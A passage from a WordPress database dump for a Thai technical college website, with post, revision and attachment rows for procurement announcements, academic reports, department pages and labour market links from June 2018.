'%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%81%e0%b8%b2-2', '', '', '2018-06-22 09:59:29', '2018-06-22 02:59:29', '', 0, 'http://www.technicrayong.ac.th/?p=3184', 378, 'post', '', 0),
(3185, 3, '2018-06-22 09:59:14', '2018-06-22 02:59:14', '', 'ประกาศ รายชื่อผู้ชนะครุภัณฑ์ แผนกคอมพิวเตอร์ธุรกิจ จำนวน 3 รายการ', '', 'inherit', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%a3%e0%b8%b0%e0%b8%81%e0%b8%b2%e0%b8%a8-%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%8a%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%9c%e0%b8%b9%e0%b9%89%e0%b8%8a%e0%b8%99%e0%b8%b0%e0%b8%84%e0%b8%a3%e0%b8%b8', '', '', '2018-06-22 09:59:14', '2018-06-22 02:59:14', '', 3184, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/ประกาศ-รายชื่อผู้ชนะครุภัณฑ์-แผนกคอมพิวเตอร์ธุรกิจ-จำนวน-3-รายการ.pdf', 0, 'attachment', 'application/pdf', 0),
(3186, 3, '2018-06-22 09:59:29', '2018-06-22 02:59:29', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B4%E0%B8%88-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-3-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์การศึกษา แผนกคอมพิวเตอร์ธุรกิจ จำนวน 3 รายการ', '', 'inherit', 'closed', 'closed', '', '3184-revision-v1', '', '', '2018-06-22 09:59:29', '2018-06-22 02:59:29', '', 3184, 'http://www.technicrayong.ac.th/3184-revision-v1/', 0, 'revision', '', 0),
(3187, 3, '2018-06-22 09:59:42', '2018-06-22 02:59:42', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F06%2F%E0%B8%9B%E0%B8%A3%E0%B8%B0%E0%B8%81%E0%B8%B2%E0%B8%A8-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%9C%E0%B8%B9%E0%B9%89%E0%B8%8A%E0%B8%99%E0%B8%B0%E0%B8%84%E0%B8%A3%E0%B8%B8%E0%B8%A0%E0%B8%B1%E0%B8%93%E0%B8%91%E0%B9%8C-%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B4%E0%B8%88-%E0%B8%88%E0%B8%B3%E0%B8%99%E0%B8%A7%E0%B8%99-3-%E0%B8%A3%E0%B8%B2%E0%B8%A2%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ประกาศ รายชื่อผู้ชนะการเสนอราคาประกวดราคาซื้อครุภัณฑ์การศึกษา แผนกคอมพิวเตอร์ธุรกิจ จำนวน 3 รายการ', '', 'inherit', 'closed', 'closed', '', '3184-autosave-v1', '', '', '2018-06-22 09:59:42', '2018-06-22 02:59:42', '', 3184, 'http://www.technicrayong.ac.th/3184-autosave-v1/', 0, 'revision', '', 0),
(3190, 3, '2018-06-22 16:31:53', '2018-06-22 09:31:53', '<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2560</span></h3>\r\n<h3><span style=\"color: #ff00ff;\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2559</span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2558.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2558</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2557.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2557</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2556.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2556</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2555.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2555</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2554.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2554</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2553.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2553</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2552.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2552</a></span></h3>\r\n<h3><span style=\"color: #ff00ff;\"><a style=\"color: #ff00ff;\" href=\"/wp-content/uploads/2018/05/รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน-นักศึกษา-ปีการศึกษา-2551.pdf\">รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา ปีการศึกษา 2551</a></span></h3>\r\n<h3></h3>', 'รายงานผลสัมฤทธิ์ทางการเรียนของนักเรียน นักศึกษา', '', 'inherit', 'closed', 'closed', '', '2418-revision-v1', '', '', '2018-06-22 16:31:53', '2018-06-22 09:31:53', '', 2418, 'http://www.technicrayong.ac.th/2418-revision-v1/', 0, 'revision', '', 0),
(3191, 3, '2018-06-25 12:24:51', '2018-06-25 05:24:51', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.604271379949054%26type%3D3&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'กิจกรรมไหว้ครูฝึกในสถานประกอบการ บริษัท เอส ซี จี เคมิคอลส์ จำกัด ภายใต้โครงการ Excellent Model School เพื่อตอบแทน และแสดงถึงการยกย่องครูฝึก ผู้ประสิทธิ์ประสาทความรู้ในวิชาชีพ แสดงถึงความเคารพในทรัพย์สินทางปัญญาแก่ครูฝึก ในวันพฤหัสบดีที่ 21 มิถุนายน 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการวิทยาลัยเทคนิคระยอง', '', 'publish', 'closed', 'open', '', '%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%84%e0%b8%ab%e0%b8%a7%e0%b9%89%e0%b8%84%e0%b8%a3%e0%b8%b9%e0%b8%9d%e0%b8%b6%e0%b8%81%e0%b9%83%e0%b8%99%e0%b8%aa%e0%b8%96%e0%b8%b2', '', '', '2018-06-25 12:24:51', '2018-06-25 05:24:51', '', 0, 'http://www.technicrayong.ac.th/?p=3191', 377, 'post', '', 0),
(3192, 3, '2018-06-25 12:24:33', '2018-06-25 05:24:33', '', '35922397_604249966617862_3267679700834582528_o', '', 'inherit', 'closed', 'closed', '', '35922397_604249966617862_3267679700834582528_o', '', '', '2018-06-25 12:24:33', '2018-06-25 05:24:33', '', 3191, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/35922397_604249966617862_3267679700834582528_o.jpg', 0, 'attachment', 'image/jpeg', 0),
(3193, 3, '2018-06-25 12:24:51', '2018-06-25 05:24:51', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.604271379949054%26type%3D3&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'กิจกรรมไหว้ครูฝึกในสถานประกอบการ บริษัท เอส ซี จี เคมิคอลส์ จำกัด ภายใต้โครงการ Excellent Model School เพื่อตอบแทน และแสดงถึงการยกย่องครูฝึก ผู้ประสิทธิ์ประสาทความรู้ในวิชาชีพ แสดงถึงความเคารพในทรัพย์สินทางปัญญาแก่ครูฝึก ในวันพฤหัสบดีที่ 21 มิถุนายน 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3191-revision-v1', '', '', '2018-06-25 12:24:51', '2018-06-25 05:24:51', '', 3191, 'http://www.technicrayong.ac.th/3191-revision-v1/', 0, 'revision', '', 0),
(3194, 3, '2018-06-25 12:25:01', '2018-06-25 05:25:01', '<p style=\"text-align: center;\"><iframe style=\"border: none; overflow: hidden;\" src=\"https://www.facebook.com/plugins/post.php?href=https%3A%2F%2Fwww.facebook.com%2Fmedia%2Fset%2F%3Fset%3Da.604271379949054%26type%3D3&width=500\" width=\"500\" height=\"778\" frameborder=\"0\" scrolling=\"no\"></iframe></p>', 'กิจกรรมไหว้ครูฝึกในสถานประกอบการ บริษัท เอส ซี จี เคมิคอลส์ จำกัด ภายใต้โครงการ Excellent Model School เพื่อตอบแทน และแสดงถึงการยกย่องครูฝึก ผู้ประสิทธิ์ประสาทความรู้ในวิชาชีพ แสดงถึงความเคารพในทรัพย์สินทางปัญญาแก่ครูฝึก ในวันพฤหัสบดีที่ 21 มิถุนายน 2561 ณ ห้องประชุมสัมมนาอาชีวศึกษา อาคารอำนวยการวิทยาลัยเทคนิคระยอง', '', 'inherit', 'closed', 'closed', '', '3191-autosave-v1', '', '', '2018-06-25 12:25:01', '2018-06-25 05:25:01', '', 3191, 'http://www.technicrayong.ac.th/3191-autosave-v1/', 0, 'revision', '', 0),
(3196, 3, '2018-06-25 13:19:02', '2018-06-25 06:19:02', '', '25-6-2561 13-20-05', '', 'inherit', 'closed', 'closed', '', '25-6-2561-13-20-05', '', '', '2018-06-25 13:19:02', '2018-06-25 06:19:02', '', 2994, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/25-6-2561-13-20-05.jpg', 0, 'attachment', 'image/jpeg', 0),
(3197, 3, '2018-06-25 13:19:44', '2018-06-25 06:19:44', '<h2><span style=\"color: #800080;\">>>จำนวนสถานประกอบการ จังหวัดระยอง</span></h2>\r\n \r\n\r\n<img class=\"size-full wp-image-3024 aligncenter\" src=\"/wp-content/uploads/2018/06/ProvinceRayong2-copy.png\" alt=\"\" width=\"657\" height=\"446\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3005 aligncenter\" src=\"/wp-content/uploads/2018/06/1-2.jpg\" alt=\"\" width=\"837\" height=\"374\" />\r\n\r\n<img class=\"size-full wp-image-3006 aligncenter\" src=\"/wp-content/uploads/2018/06/14-6-2561-10-42-35.jpg\" alt=\"\" width=\"839\" height=\"301\" />\r\n<h3><a href=\"/รายงานการติดตามผลผู้สา\"><span style=\"color: #0000ff;\">รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน </span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับหน่วยงานภายนอก</strong></span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ-2\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับต่างประเทศ </strong></span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี.pdf\">สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี</a></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a>\r\n\r\n<a href=\"https://eservice.labour.go.th/dlpwMapWeb/map/\"><img class=\"aligncenter wp-image-3196 size-full\" src=\"/wp-content/uploads/2018/06/25-6-2561-13-20-05.jpg\" alt=\"\" width=\"965\" height=\"155\" /></a>\r\n\r\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-revision-v1', '', '', '2018-06-25 13:19:44', '2018-06-25 06:19:44', '', 2994, 'http://www.technicrayong.ac.th/2994-revision-v1/', 0, 'revision', '', 0),
(3199, 3, '2018-06-25 13:23:30', '2018-06-25 06:23:30', '<h2><span style=\"color: #800080;\">>>จำนวนสถานประกอบการ จังหวัดระยอง</span></h2>\r\n \r\n\r\n<img class=\"size-full wp-image-3024 aligncenter\" src=\"/wp-content/uploads/2018/06/ProvinceRayong2-copy.png\" alt=\"\" width=\"657\" height=\"446\" />\r\n\r\n \r\n\r\n<img class=\"size-full wp-image-3005 aligncenter\" src=\"/wp-content/uploads/2018/06/1-2.jpg\" alt=\"\" width=\"837\" height=\"374\" />\r\n\r\n<img class=\"size-full wp-image-3006 aligncenter\" src=\"/wp-content/uploads/2018/06/14-6-2561-10-42-35.jpg\" alt=\"\" width=\"839\" height=\"301\" />\r\n<h3><a href=\"/รายงานการติดตามผลผู้สา\"><span style=\"color: #0000ff;\">รายงานการติดตามผลผู้สำเร็จการศึกษา เข้าสู่ตลาดแรงงาน </span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับหน่วยงานภายนอก</strong></span></a></h3>\r\n<h3><a href=\"/สรุปโครงการความร่วมมือ-2\"><span style=\"color: #0000ff;\"><strong>สรุปโครงการความร่วมมือกับต่างประเทศ </strong></span></a></h3>\r\n<h3><a href=\"/wp-content/uploads/2018/06/สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี.pdf\">สรุปโครงการความร่วมมือการจัดการอาชีวศึกษาระบบทวิภาคี</a></h3>\r\n<h3><span style=\"color: #0000ff;\">ข้อมูลตลาดแรงงาน และสถานประกอบการจังหวัดระยอง เพิ่มเติม >>> ตามเวปไซต์ และ LINK ด้านล่าง</span></h3>\r\n<a href=\"https://www.doe.go.th/prd/\"><img class=\"alignnone wp-image-2995\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-38-18.jpg\" alt=\"\" width=\"972\" height=\"152\" /></a>\r\n\r\n<a href=\"http://rayong.mol.go.th/\"><img class=\"alignnone wp-image-2996 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-44-40.jpg\" alt=\"\" width=\"905\" height=\"152\" /></a>\r\n\r\n<a href=\"http://www.ftijob.com/\"><img class=\"alignnone size-full wp-image-2997\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-48-31.jpg\" alt=\"\" width=\"979\" height=\"366\" /></a>\r\n\r\n<a href=\"https://www.doe.go.th/lmi-east/\"><img class=\"alignnone wp-image-2998\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-50-31.jpg\" alt=\"\" width=\"1041\" height=\"152\" /></a><a href=\"https://eservice.labour.go.th/dlpwMapWeb/map/\"><img class=\"wp-image-3196 size-full alignleft\" src=\"/wp-content/uploads/2018/06/25-6-2561-13-20-05.jpg\" alt=\"\" width=\"965\" height=\"155\" /></a>\r\n\r\n<a href=\"http://www.v-cop.go.th/v-cop/\"><img class=\"alignnone wp-image-3001 size-full\" src=\"/wp-content/uploads/2018/06/13-6-2561-15-57-42.jpg\" alt=\"\" width=\"1212\" height=\"356\" /></a>', 'ข้อมูลสถานประกอบการ', '', 'inherit', 'closed', 'closed', '', '2994-revision-v1', '', '', '2018-06-25 13:23:30', '2018-06-25 06:23:30', '', 2994, 'http://www.technicrayong.ac.th/2994-revision-v1/', 0, 'revision', '', 0),
(3200, 3, '2018-06-25 14:31:26', '2018-06-25 07:31:26', '<a href=\"/%e0%b8%9b%e0%b8%b4%e0%b9%82%e0%b8%95%e0%b8%a3%e0%b9%80%e0%b8%84%e0%b8%a1%e0%b8%b5/1-22/\"><img class=\"alignnone size-full wp-image-11937\" src=\"/wp-content/uploads/2021/07/1-2.png\" alt=\"\" width=\"3508\" height=\"2480\" /></a>', 'ปิโตรเคมี', '', 'publish', 'closed', 'closed', '', '%e0%b8%9b%e0%b8%b4%e0%b9%82%e0%b8%95%e0%b8%a3%e0%b9%80%e0%b8%84%e0%b8%a1%e0%b8%b5', '', '', '2021-07-06 10:58:41', '2021-07-06 03:58:41', '', 0, 'http://www.technicrayong.ac.th/?page_id=3200', 0, 'page', '', 0),
(3201, 3, '2018-06-25 14:08:48', '2018-06-25 07:08:48', '', '25-6-2561 13-48-51', '', 'inherit', 'closed', 'closed', '', '25-6-2561-13-48-51', '', '', '2018-06-25 14:08:48', '2018-06-25 07:08:48', '', 3200, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/25-6-2561-13-48-51.jpg', 0, 'attachment', 'image/jpeg', 0),
(3202, 3, '2018-06-25 14:08:53', '2018-06-25 07:08:53', '', '25-6-2561 13-58-08', '', 'inherit', 'closed', 'closed', '', '25-6-2561-13-58-08', '', '', '2018-06-25 14:08:53', '2018-06-25 07:08:53', '', 3200, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/25-6-2561-13-58-08.jpg', 0, 'attachment', 'image/jpeg', 0),
(3203, 3, '2018-06-25 14:08:57', '2018-06-25 07:08:57', '', '25-6-2561 13-58-25', '', 'inherit', 'closed', 'closed', '', '25-6-2561-13-58-25', '', '', '2018-06-25 14:08:57', '2018-06-25 07:08:57', '', 3200, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/25-6-2561-13-58-25.jpg', 0, 'attachment', 'image/jpeg', 0),
(3204, 3, '2018-06-25 14:31:26', '2018-06-25 07:31:26', '<img class=\"aligncenter wp-image-3201 size-full\" src=\"/wp-content/uploads/2018/06/25-6-2561-13-48-51.jpg\" alt=\"\" width=\"188\" height=\"239\" /> <img class=\"aligncenter wp-image-3202\" src=\"/wp-content/uploads/2018/06/25-6-2561-13-58-08.jpg\" alt=\"\" width=\"373\" height=\"101\" /> <img class=\"aligncenter wp-image-3203 size-full\" src=\"/wp-content/uploads/2018/06/25-6-2561-13-58-25.jpg\" alt=\"\" width=\"954\" height=\"330\" />', 'ปิโตรเคมี', '', 'inherit', 'closed', 'closed', '', '3200-revision-v1', '', '', '2018-06-25 14:31:26', '2018-06-25 07:31:26', '', 3200, 'http://www.technicrayong.ac.th/3200-revision-v1/', 0, 'revision', '', 0),
(3206, 3, '2018-06-25 15:57:32', '2018-06-25 08:57:32', '<img class=\"aligncenter size-full wp-image-3207\" src=\"/wp-content/uploads/2018/06/25-6-2561-15-49-38.jpg\" alt=\"\" width=\"195\" height=\"241\" /> <img class=\"aligncenter wp-image-3208\" src=\"/wp-content/uploads/2018/06/25-6-2561-15-49-50-300x82.jpg\" alt=\"\" width=\"371\" height=\"101\" /> <img class=\"aligncenter wp-image-3209 size-full\" src=\"/wp-content/uploads/2018/06/25-6-2561-15-57-57.jpg\" alt=\"\" width=\"958\" height=\"329\" />', 'เคมีอุตสาหกรรม', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%84%e0%b8%a1%e0%b8%b5%e0%b8%ad%e0%b8%b8%e0%b8%95%e0%b8%aa%e0%b8%b2%e0%b8%ab%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1', '', '', '2018-06-25 16:25:58', '2018-06-25 09:25:58', '', 0, 'http://www.technicrayong.ac.th/?page_id=3206', 0, 'page', '', 0),
(3207, 3, '2018-06-25 15:56:15', '2018-06-25 08:56:15', '', '25-6-2561 15-49-38', '', 'inherit', 'closed', 'closed', '', '25-6-2561-15-49-38', '', '', '2018-06-25 15:56:15', '2018-06-25 08:56:15', '', 3206, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/25-6-2561-15-49-38.jpg', 0, 'attachment', 'image/jpeg', 0),
(3208, 3, '2018-06-25 15:56:19', '2018-06-25 08:56:19', '', '25-6-2561 15-49-50', '', 'inherit', 'closed', 'closed', '', '25-6-2561-15-49-50', '', '', '2018-06-25 15:56:19', '2018-06-25 08:56:19', '', 3206, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/25-6-2561-15-49-50.jpg', 0, 'attachment', 'image/jpeg', 0),
(3209, 3, '2018-06-25 15:56:24', '2018-06-25 08:56:24', '', '25-6-2561 15-57-57', '', 'inherit', 'closed', 'closed', '', '25-6-2561-15-57-57', '', '', '2018-06-25 15:56:24', '2018-06-25 08:56:24', '', 3206, 'http://www.technicrayong.ac.th/wp-content/uploads/2018/06/25-6-2561-15-57-57.jpg', 0, 'attachment', 'image/jpeg', 0),
(3213, 3, '2018-06-25 15:57:32', '2018-06-25 08:57:32', '<img class=\"aligncenter size-full wp-image-3207\" src=\"/wp-content/uploads/2018/06/25-6-2561-15-49-38.jpg\" alt=\"\" width=\"195\" height=\"241\" /> <img class=\"aligncenter wp-image-3208\" src=\"/wp-content/uploads/2018/06/25-6-2561-15-49-50-300x82.jpg\" alt=\"\" width=\"371\" height=\"101\" /> <img class=\"aligncenter wp-image-3209 size-full\" src=\"/wp-content/uploads/2018/06/25-6-2561-15-57-57.jpg\" alt=\"\" width=\"958\" height=\"329\" />', 'เคมีอุตสาหกรรม', '', 'inherit', 'closed', 'closed', '', '3206-revision-v1', '', '', '2018-06-25 15:57:32', '2018-06-25 08:57:32', '', 3206, 'http://www.technicrayong.ac.th/3206-revision-v1/', 0, 'revision', '', 0),
(3214, 3, '2018-06-25 16:26:05', '2018-06-25 09:26:05', '<img class=\"aligncenter size-full wp-image-3207\" src=\"/wp-content/uploads/2018/06/25-6-2561-15-49-38.jpg\" alt=\"\" width=\"195\" height=\"241\" /> <img class=\"aligncenter wp-image-3208\" src=\"/wp-content/uploads/2018/06/25-6-2561-15-49-50-300x82.jpg\" alt=\"\" width=\"371\" height=\"101\" /> <img class=\"aligncenter wp-image-3209 size-full\" src=\"/wp-content/uploads/2018/06/25-6-2561-15-57-57.jpg\" alt=\"\" width=\"958\" height=\"329\" />', 'เคมีอุตสาหกรรม', '', 'inherit', 'closed', 'closed', '', '3206-autosave-v1', '', '', '2018-06-25 16:26:05', '2018-06-25 09:26:05', '', 3206, 'http://www.technicrayong.ac.th/3206-autosave-v1/', 0, 'revision', '', 0),
(3215, 3, '2018-06-27 15:52:05', '2018-06-27 08:52:05', '<h3><a href=\"/ข้อมูลนักเรียน-นักศึกษ-3\"><span style=\"color: #0000ff;\">ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2561 <span style=\"color: #ff0000;\">NEW !!</span></span></a></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ข้อมูลนักเรียน นักศึกษา ปีการศึกษา 2560</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2559.pdf\"> 2559</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2558.pdf\"> 2558</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2557.pdf\"> 2557</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2556.pdf\"> 2556</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2555.pdf\"> 2555</a></strong></span></h3>\r\n<h3><span style=\"color: #0000ff;\"><strong><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2554.pdf\">ข้อมูลนักเรียน นักศึกษา </a><a style=\"color: #0000ff;\" href=\"/wp-content/uploads/2018/05/ข้อมูลนักเรียน-นักศึกษา-2560.pdf\">ปีการศึกษา</a><a style=\"color: #0000ff;\" 